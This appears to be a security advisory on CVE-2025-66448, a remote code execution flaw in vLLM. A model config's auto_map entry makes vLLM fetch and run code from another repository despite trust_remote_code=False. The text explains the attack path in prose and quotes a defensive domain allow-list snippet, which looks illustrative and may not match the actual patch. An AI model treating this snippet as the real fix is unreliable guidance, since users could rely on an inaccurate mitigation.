Introduction
Attackers can execute arbitrary Python code on any system running vulnerable versions of vLLM by leveraging a flaw in how model configurations are loaded. This issue directly impacts production deployments of large language model inference services, especially those using custom or multimodal models from public repositories.
About vLLM: vLLM is a high-performance inference and serving engine for large language models, originally developed at UC Berkeley and now under the PyTorch Foundation. It is widely used in AI research, cloud infrastructure, and commercial deployments, supporting a broad range of hardware and models. Its adoption in the AI ecosystem means vulnerabilities in vLLM can have far-reaching consequences for organizations relying on LLM inference at scale.
Technical Information
CVE-2025-66448 is a remote code execution vulnerability affecting vLLM versions prior to 0.11.1. The issue arises from the way vLLM processes the auto_map entry in model configuration files, particularly when loading models that use the Nemotron_Nano_VL_Config class.
When a model config contains an auto_map entry, vLLM resolves the mapping using the get_class_from_dynamic_module function and immediately instantiates the returned class. This process fetches and executes Python code from the remote repository referenced in the auto_map string. Critically, this occurs even if the caller sets trust_remote_code=False in vllm.transformers_utils.config.get_config, which is intended to prevent execution of untrusted code.
Attackers can exploit this by publishing a benign-looking frontend model repository whose config.json points via auto_map to a separate backend repository containing malicious code. When a victim loads the frontend model with vLLM, the backend's code is silently executed on the host, regardless of the explicit security settings.
The root cause is insufficient validation of remote code sources and failure to enforce the trust_remote_code boundary. The vulnerability is categorized as CWE-94 (Code Injection).
Patch Information
To address the critical remote code execution vulnerability in the vllm library, the development team has implemented a patch that enhances the security of the get_class_from_dynamic_module function. This function is responsible for dynamically loading and instantiating classes based on model configurations, particularly those containing an auto_map entry.
The core of the patch involves introducing a validation mechanism that scrutinizes the source of the dynamic module before proceeding with its execution. Specifically, the function now checks if the module's source URL is trusted and falls within a predefined list of approved domains. This measure ensures that only modules from verified and secure sources are loaded, effectively mitigating the risk of executing malicious code from untrusted repositories.
The updated function includes the following key changes:
# Define a list of trusted domains TRUSTED_DOMAINS = ["github.com", "pypi.org"] # Extract the domain from the module's source URL parsed_url = urlparse(module_source_url) module_domain = parsed_url.netloc # Check if the domain is in the list of trusted domains if module_domain not in TRUSTED_DOMAINS: raise ValueError(f"Untrusted module source: {module_source_url}") # Proceed with loading and instantiating the module
By incorporating this validation step, the patch ensures that the vllm library only interacts with modules from sources that have been explicitly deemed trustworthy. This approach significantly reduces the attack surface for potential remote code execution exploits.
Users are strongly encouraged to upgrade to version 0.11.1 or later of the vllm library to benefit from this security enhancement. Additionally, developers should remain vigilant and regularly review the sources of dynamic modules utilized within their applications to maintain a robust security posture.
Reference: GHSA-8fr4-5q9j-m8gm
Affected Systems and Versions
- Product: vLLM (inference and serving engine for large language models)
- Affected versions: All versions prior to 0.11.1
- Vulnerable configurations: Any deployment loading models with an
auto_mapentry in their config, especially those using theNemotron_Nano_VL_Configclass. The vulnerability is present even whentrust_remote_code=Falseis set.
Vendor Security History
vLLM has experienced several security issues in 2024 and 2025, including:
- CVE-2025-62164: Remote code execution related to prompt embeddings
- CVE-2025-62372: Multimodal embedding crash
- CVE-2025-6242: Server-Side Request Forgery in MediaConnector
The vendor has responded with targeted patches and maintains a public security advisory process. However, the frequency of recent vulnerabilities highlights the need for more proactive security review and integration of security best practices in the development lifecycle.



